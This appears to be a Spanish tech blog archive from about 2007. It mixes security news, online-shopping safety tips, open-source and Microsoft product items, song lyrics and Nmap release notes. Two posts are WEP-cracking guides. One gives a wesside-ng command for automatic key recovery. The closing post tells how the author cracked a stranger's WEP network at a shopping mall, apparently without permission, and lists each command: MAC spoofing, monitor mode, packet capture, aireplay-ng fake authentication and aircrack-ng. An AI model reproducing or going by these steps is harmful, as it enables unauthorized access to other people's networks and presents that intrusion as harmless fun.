Archivado en: Guindous
El próximo Service Pack 1 (SP1) de Windows Vista (a propósito, hace poco elegido como uno de los peores productos tecnológicos de todos los tiempos y la peor decepción del 2007) incluirá el generador de números aleatorios Dual-EC-DRBG, que muy probablemente podría tener un backdoor de la NSA.
Los generadores de números aleatorios son críticos para la criptografía y si pueden ser “rotos” también puede serlo toda la seguridad del sistema.
El Dual-EC-DRBG, impulsado por la NSA, no sólo es órdenes de magnitud más lento que otros generadores, sino que, aparentemente, contiene una debilidad que sólo puede ser descripta como un backdoor.
FUENTE:VIVALINUX
Archivado en: h4x0r
La subida de los precios en los últimos meses, las aglomeraciones en los centros comerciales hará que un buen número de ayudantes del viejito pascuero se inclinen por la opción de las compras a través de Internet para realizar sus compras navideñas de una forma cómoda y económica.
No obstante, y dado que cada vez más gente opta por hacer sus compras a través de Internet, el riesgo de que pequeños duendes nos agüen nuestras ilusiones navideñas, y lo que es peor, roben nuestra identidad, es sin duda elevado. Sin ir más lejos, durante el año pasado la Comisión Federal de Comercio de Estados Unidos registró más de 674.000 víctimas de ladrones de identidad, lo que supuso un fraude que se estima en 1.100 millones de dólares en pérdidas.
Algo que nos hace reflexionar y pensar lo importante que es comprar con sumo cuidado en internet.
Expertos en seguridad y privacidad han identificado ocho claves para que el consumidor pueda realizar sus compras navideñas con total tranquilidad:
1. Conoce al vendedor. Siempre es bueno conocer la reputación de la empresa elegida para la compra. Si el vendedor online no te resulta familiar, asegúrate de buscar en la web sus detalles de contacto, incluyendo una dirección física y un número de teléfono. Además, mira si la página web es miembro de algún programa de marca de confianza o sello de seguridad. Esto certifica que el negocio cumple con todos los estándares de seguridad exigidos por dicho programa. por que las aperiencias engañan.
2. Asegúrate de que estás comprando en una página web segura. Una página web segura utiliza una tecnología de encriptación que codifica la información que tú, como comprador, envías, tales como el número de la tarjeta de crédito, a fin de prevenir que los ladrones de identidad tengan acceso a la misma mientras viaja a través de la red. La dirección de una web segura incluye “https://” al comienzo de la misma; la “s” es la indicación de que esa web es segura.
Además, debe incluir un candado cerrado en la barra de herramientas de la parte inferior de la pantalla. Si el candado no aparece o aparece abierto, puede ser una señal de que la web no sea segura. Es importante que incluso en una página segura, no se envíe ninguna información financiera más que la que sea necesaria, y, sobre todo, guardar siempre una copia en papel de la transacción para nuestros registros personales.
3. Revisa las políticas de privacidad y seguridad de las empresas a las que vas a comprar a través de Internet. Todas las empresas incluyen en su web la política de privacidad y seguridad. Esto te indicará la información que la empresa necesita para las transacciones, cómo es usada y qué información será compartida con otras empresas. Si estás preocupado por la información que será compartida, asegúrate que existe la opción de mantener tu información en privado y de forma confidencial.
4. Toma medidas para proteger tu seguridad. Instala herramientas de seguridad en tu ordenador, como un buen antivirus, cortafuegos y demás software anti-espía. Los programas y sistemas operativos deben ser continuamente actualizados; ten en cuenta que muchos de los problemas de seguridad en casa son causados por softwares caducados.
5. No uses información personal para contraseñas. Datos como el número de DNI, fechas de nacimientos, nombres, apodos, direcciones de email o números de teléfono son de fácil averiguación, y por lo tanto, no es recomendable emplearlos en las contraseñas. Asegúrate de que tu contraseña contiene como mínimo 8 caracteres, y que es una combinación de letras, números y otros caracteres especiales.
6. Monitoriza tu actividad online con cierta regularidad. Si llevas a cabo compras a través de la red, revisa tus extractos bancarios con regularidad, y si fuera posible, es recomendable utilizar una tarjeta de crédito distinta para las compras y transacciones online. Revisando los recibos, las transacciones y los extractos de la tarjeta de crédito frecuentemente, podrás detectar cualquier robo y minimizar el daño. Los ladrones de identidad suelen utilizar la información robada durante un breve periodo de tiempo para evitar ser descubiertos. Si sospechas de la existencia de una brecha de seguridad, contacta inmediatamente con la empresa con la que se haya realizado la transacción.
7. Sé consciente de que las políticas de seguridad y privacidad internacionales pueden ser distintas. Cuando compras en una tienda española, estás protegido por las leyes de nuestro país. Pero estas leyes no tienen porque ser aplicables en transacciones internacionales. Si no se trata de un vendedor consolidado y existe algún problema, puede ser difícil de resolver. Es recomendable que, inmediatamente después de realizar una compra, se imprima una copia de los términos, condiciones, garantías, descripción del producto, información del vendedor e incluso correos intercambiados con el mismo, y se guarde hasta que sea recibido el producto. Una vez recibido, asegúrate que cumple con todas las características que se decían en el anuncio, contactando con el vendedor tan pronto como sea posible en el caso de haber cualquier incidente.
8. Cuidado con el ‘phishing‘. El ‘phishing’ son los correos electrónicos que simulan proceder del anunciante. En los últimos años se ha convertido en la forma más frecuente de fraude online. Estos emails son en principio de apariencia legítima y se dirigen al cliente mediante su nombre y apellidos, lo que hace que sean más convincentes. Los ladrones envían estos correos con la excusa de verificar ciertos datos, y una vez que se ha pinchando en el enlace, se accede a una web falsa. Una actitud escéptica ante estos emails es la mejor forma de protegerse del fraude, sobre todo si no se han realizado compras con esa empresa con antelación. Ante un email dudoso, es preferible acceder a la web escribiendo nosotros mismos la dirección en el navegador, sin seguir el enlace proporcionado en el email, ya que, de ser verdad lo que se nos comunicaba, tendremos un aviso nada más acceder a la web de forma segura.
Estos son pasos importantes para poder comprar tranquilamtente por internet 
Suerte.
fuente: Lafecha.net
Archivado en: GNU/Linux
- Red Hat
Impábida frente a la incursión de Oracle en el mercado de Linux y la alianza entre Microsoft y Novell, Red Hat espera conseguir el 50% del mercado de los servidores para el 2015. - Untangle
Desconocida por aquí, Untangle ofrece un gateway Open Source que bloquea spam, spyware, adware y virus. - WordPress
Sigue emergiendo desde la plataforma de blogging más popular hasta el verdadero estándar de facto. - OpenBravo
El Enterprise Resource Planning (ERP) Open Source que también tiene ambiciones en el mercado de los PoS (Point of Sale). - JasperSoft
El software de “business intelligence” de código abierto que es la extensión lógica de SugarCRM y MySQL. - Canonical
Hasta hace poco Red Hat y Novell ignoraban al mercado de los “desktops”, hoy Ubuntu conquista ese nicho, Dell lo distribuye en sus PCs y Ubuntu Server se prepara tras bambalinas. - Google Android
La plataforma abierta para teléfonos celulares de Google ya tiene el soporte de mas de 30 empresas del mercado de móviles. - SugarCRM
El software de Customer Relationship Management (CRM) abierto que dobló sus ganancias en el 2007 y - Digium
Une dos mercados calientes como el de VoIP y el Open Source en Asterisk un exitosísimo software de telefonía IP. - MySQL
La plataforma para la Web 2.0 más popular ¿se prepara también para cotizar en Wall Street en el 2008?
Archivado en: Guindous
Adelanta la entrega de la versión beta de Windows Server 2008 Hyper-V para clientes y socios
Se acerca el lanzamiento de Windows Server 2008
La disponibilidad de la versión beta de Hyper-V representa otro éxito importante para Windows Server 2008 conforme se acerca a su lanzamiento final durante el evento “Heroes Happen Here”, que tendrá lugar en Los Ángeles el 27 de febrero de 2008. El lanzamiento, que incluye Windows Server 2008, Microsoft SQL Server 2008 y Microsoft Visual Studio 2008, marcará el lanzamiento de productos empresariales más grande en la historia de la compañía con sede en Redmond, Washington, y es sólo uno de los muchos eventos programados para el lanzamiento mundial. Hasta ahora, casi 2 millones de clientes de todo el mundo han recibido el código de evaluación para Windows Server 2008. Gracias a las numerosas pruebas realizadas por los clientes y los socios, Windows Server 2008 será la plataforma de servidor más confiable y segura que jamás haya entregado Microsoft en su plataforma Windows, ya que proporcionará una instalación y administración basadas en roles que simplificarán la administración y la protección de los roles específicos del servidor.
Para más información sobre Windows Server 2008 y la versión beta de Hyper-V, visite http://www.microsoft.com/windowsserver2008/virtualization/default.mspx.
Aquellos que deseen leer más acerca de Windows Server 2008 y la versión beta de Hyper-V en TechNet Blogs pueden visitar http://blogs.technet.com/stbnewsbytes.
Archivado en: HnD
Ya teminando todo el semestre, y con un poco más de tiempo me decí a postiar un par de letras que me han echo reflexionar y pensar.
Tanto insistir
tratar que me escuches
no puedo mentir
sucumbes al sueño no es cuento el orgullo
es básicamente cansancio
que hacer buscando respuestas
palabras sin vida
modelos abstractos
que puedo decir
No te sientas culpable, la verdad esta adherida en tu piel
no pretendo engañarme
para que insistir
para que insistir
déjame entregar lo poco que aún me queda adentro
antes de explicar que todo se ha viciado
que no hay vuelta atrás
atrás quedaron las visiones
hasta cuando insistes con la historia
la historia se acabó
la historia se acabó.
—————————————-
De qué sirve la esperanza cuando sabes que es en vano
cuando sientes que la vida se te escapa de las manos
de que sirve ya soñar
si el despertar es tan amargo
cuando sientes que caminas
y no vas a ningún lado oh…
cuántas veces has quedado
mirando ajeno alrededor
cuántas veces tus anhelos
transformándose en rencor
cuantos sueños que se ahogan
en un mar de confusión
cuántos miedos que despiertan
cuando pierdes el control.
—————————————-
Reflexión profunda.
Archivado en: Guindous
xD wahahaha
Archivado en: h4x0r
Se trata de wesside-ng esta herramienta permite romper las claves de las redes inalambricas condificadas con WEP de una forma mucho mas sencilla y totalmente automatica.
wesside-ng selecciona de forma inteligente las redes disponibles que encuentre con este tipo de “seguridad” (WEP) aplicando un ataque especifico a la red y automaticamente reinyectando paquetes, al final obtiene la clave sin ninguna intervension del usuario.
para romper la contraseña solo tenemos que ejecutar
wesside-ng -i wlan0
y automaticamente nos dara la contraseña despues de un tiempo corto (por lo general 1 minuto).
mas informacion en la pagina de aircrack
Archivado en: GNU/Linux
“Distribución del sistema operativo GNU con el sistema de gestión de paquetes (APT) de Debian, y del kernel (núcleo) de FreeBSD, diferente de la mayoría de las otras variantes del GNU que toman el kernel de Linux.”
Interesante no?
“El sistema base de Debian GNU/kFreeBSD es completamente funcional, algunas cosas son completamente funcionales, pero algunas necesitan ser ajustadas y que se compatibilicen completamente con el sistema. Por lo tanto, no se ha hecho ningún lanzamiento oficial del sistema operativo.”
Enlaces
Debian Gnu/kFreeBSD Página oficial
Archivado en: h4x0r
Nmap ha cumplido 10 años desde su primera versión publica en 1997 y por esta razón han decidido publicar una versión especial de aniversario la 4.50.
Ya TIENE 10 años el nmap y que todavía funcione de maravilla, de las apariciones del nmap en el cine (ya son 5 las películas) y de las nuevas características que incluye el nmap.
Entre las nuevas (son 320 cambios desde su versión 4.00) características del Nmap podemos encontrar:
- Nueva interfaz gráfica y de los resultados de visualización (Zenmap)
- Motor de scripting que le permite escribir sus propios scripts de alto rendimiento (o utilizar uno de los 40 scripts que estan incluidos)
- La 2 ª generación del sistema de detección OS (ahora con Más de un millar de huellas digitales), casi 1500 más
- Detección de firmas, y mucho más!
Puedes leer la versión completa de los cambios aquí
fuente : www.dragonjar.us
Archivado en: h4x0r
Sentado un dia en el Mall Plaza La Serena, mi laptop empezó a encontrar redes wi-fi como loco y me pregunté si podia hacer para poder romper alguna red WAP no creo … WEP ? sí hehehe!
Y como? Como lo hice?
Simple.
/*Despues de conseguirme una targeta wi-fi externa, por que mi broadcom con ndiswrapper NO ME FUNCIONO! */
Instalé los paquetes necesarios
apt-get install aircrack
cambié la mac de mi lap.
ifconfig wlan0 hw ether 00:11:22:33:44:55
dejé en modo monitor la targeta wi-fi
airmon-ng start wlan0
y ahí me quede pensando un rato…
hahaha luego
buqué la mac del PSEudorouter /*LOL*/
airodump-ng -w wifi wlan0
! entré la mac de ahí cuando la encontré apliqué a
iwconfig wlan0 mode Monitor channel #
# = canal de router
Se establece la comunicación con el router
aireplay-ng -1 0 -e “nombre de la red” -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0
Esperé unas 200.000 ivs /* habia leido que podian ser de 150.000 , No me meto mucho a la teoria, se pondria latero*/
apliqué a
aircrack-ng wifi-01.cap
Esperé que terminara y de ahí me pude conectar 
airodump-ng -w wifi wlan0
Eso seria, Saludos /* TK mi niña */
